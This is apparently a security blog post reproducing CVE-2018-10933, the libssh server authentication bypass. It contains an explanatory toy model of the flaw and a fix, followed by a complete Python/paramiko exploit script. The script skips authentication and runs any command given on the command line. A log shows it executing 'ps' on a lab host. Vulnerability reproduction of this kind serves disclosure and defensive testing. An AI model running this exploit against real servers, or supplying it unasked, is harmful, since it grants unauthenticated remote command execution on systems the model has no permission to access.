2018-10-16: libssh published an update advisory to address CVE-2018-10933
libssh versions 0.6 and later have an authentication bypass vulnerability in the server-side code. By presenting the server with an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message the server expects to start authentication, an attacker can authenticate successfully without any credentials and then carry out malicious operations.
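The defect described above, as an added example (not this post's script and not libssh's own code): a toy server-side userauth dispatcher modelled on the flaw class, with the vulnerable handling beside a hardened version. The message numbers are the RFC 4252 values; the "user:password" payload, the `ServerSession` class and the `run` helper are constructed stand-ins for the real wire format and session state.

```python
# Added example: a toy model of a server-side SSH userauth dispatcher, not libssh's
# own code. Message numbers are the RFC 4252 values; the password check is a stand-in.
SSH_MSG_USERAUTH_REQUEST = 50   # client -> server: "please authenticate me"
SSH_MSG_USERAUTH_FAILURE = 51   # server -> client
SSH_MSG_USERAUTH_SUCCESS = 52   # server -> client: authentication accepted

# The only message a server should accept from a client during the auth phase.
CLIENT_AUTH_MESSAGES = {SSH_MSG_USERAUTH_REQUEST}


class ServerSession:
    def __init__(self, expected_password):
        self.authenticated = False
        self.expected_password = expected_password


def handle_userauth_request(session, payload):
    # Constructed toy payload "user:password" stands in for the real wire format.
    _user, _, password = payload.partition(":")
    if password == session.expected_password:
        session.authenticated = True
        return SSH_MSG_USERAUTH_SUCCESS
    return SSH_MSG_USERAUTH_FAILURE


def dispatch_vulnerable(session, msg_type, payload):
    # Flaw class behind CVE-2018-10933: one dispatch table serves both roles, so a
    # USERAUTH_SUCCESS sent by the client reaches the handler meant only for the
    # client side, and that handler marks the session as authenticated.
    if msg_type == SSH_MSG_USERAUTH_REQUEST:
        return handle_userauth_request(session, payload)
    if msg_type == SSH_MSG_USERAUTH_SUCCESS:
        session.authenticated = True
        return None
    return SSH_MSG_USERAUTH_FAILURE


def dispatch_fixed(session, msg_type, payload):
    # Hardened: check the message number against the peer's role before any handler
    # runs. A server-to-client number arriving from the client is rejected outright.
    if msg_type not in CLIENT_AUTH_MESSAGES:
        return SSH_MSG_USERAUTH_FAILURE
    return handle_userauth_request(session, payload)


def run(dispatch, messages, expected_password="s3cret"):
    """Feed (msg_type, payload) pairs through a dispatcher; return the auth state."""
    session = ServerSession(expected_password)
    for msg_type, payload in messages:
        dispatch(session, msg_type, payload)
    return session.authenticated
```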
References:
https://www.libssh.org/security/advisories/CVE-2018-10933.txt
https://www.seebug.org/vuldb/ssvid-97614
Reproducing the vulnerability:
Following the PoC given at https://www.seebug.org/vuldb/ssvid-97614, we wrote a simple reproduction script:
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))
        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()
        # send SSH2_MSG_USERAUTH_SUCCESS in place of the USERAUTH_REQUEST the server expects
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)
        client = transport.open_session(timeout=10)
        client.exec_command(command)
        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)
        output = stdout.read()
        error = stderr.read()
        stdout.close()
        stderr.close()
        return (output + error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")
    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
Check the version:
Run the script:
xxxxxx@kali:~/data$ python3 CVE-2018-10933.py 192.168.3.5 2222 "ps"
DEBUG:paramiko.transport:starting thread (client mode): 0x1982d050
DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.4.1
DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-libssh_0.8.1
INFO:paramiko.transport:Connected (version 2.0, client libssh_0.8.1)
DEBUG:paramiko.transport:kex algos:['curve25519-sha256', 'curve25519-sha256@libssh.org', 'ecdh-sha2-nistp256', 'ecdh-sha2-nistp384', 'ecdh-sha2-nistp521', 'diffie-hellman-group14-sha1', 'diffie-hellman-group1-sha1'] server key:['ssh-rsa'] client encrypt:['chacha20-poly1305@openssh.com', 'aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] server encrypt:['chacha20-poly1305@openssh.com', 'aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] client mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] server mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] client compress:['none', 'zlib', 'zlib@openssh.com'] server compress:['none', 'zlib', 'zlib@openssh.com'] client lang:[''] server lang:[''] kex follows?False
DEBUG:paramiko.transport:Kex agreed: ecdh-sha2-nistp256
DEBUG:paramiko.transport:HostKey agreed: ssh-rsa
DEBUG:paramiko.transport:Cipher agreed: aes128-ctr
DEBUG:paramiko.transport:MAC agreed: hmac-sha2-256
DEBUG:paramiko.transport:Compression agreed: none
/home/e2a5e/.local/lib/python3.7/site-packages/paramiko/kex_ecdh_nist.py:39: CryptographyDeprecationWarning: encode_point has been deprecated on EllipticCurvePublicNumbers and will be removed in a future version. Please use EllipticCurvePublicKey.public_bytes to obtain both compressed and uncompressed point encoding.
  m.add_string(self.Q_C.public_numbers().encode_point())
/home/e2a5e/.local/lib/python3.7/site-packages/paramiko/kex_ecdh_nist.py:92: CryptographyDeprecationWarning: Support for unsafe construction of public numbers from encoded data will be removed in a future version. Please use EllipticCurvePublicKey.from_encoded_point
  self.curve, Q_S_bytes
/home/e2a5e/.local/lib/python3.7/site-packages/paramiko/kex_ecdh_nist.py:103: CryptographyDeprecationWarning: encode_point has been deprecated on EllipticCurvePublicNumbers and will be removed in a future version. Please use EllipticCurvePublicKey.public_bytes to obtain both compressed and uncompressed point encoding.
  hm.add_string(self.Q_C.public_numbers().encode_point())
DEBUG:paramiko.transport:kex engine KexNistp256 specified hash_algo <built-in function openssl_sha256>
DEBUG:paramiko.transport:Switch to new keys ...
DEBUG:paramiko.transport:[chan 0] Max packet in: 32768 bytes
DEBUG:paramiko.transport:[chan 0] Max packet out: 35000 bytes
DEBUG:paramiko.transport:Secsh channel 0 opened.
DEBUG:paramiko.transport:[chan 0] Sesch channel 0 request ok
DEBUG:paramiko.transport:[chan 0] EOF received (0)
DEBUG:paramiko.transport:[chan 0] EOF sent (0)
  PID TTY          TIME CMD
    1 ?        00:00:00 sh
    6 ?        00:00:00 ssh_server_fork
    8 ?        00:00:00 ssh_server_fork
    9 ?        00:00:00 sh
   10 ?        00:00:00 ps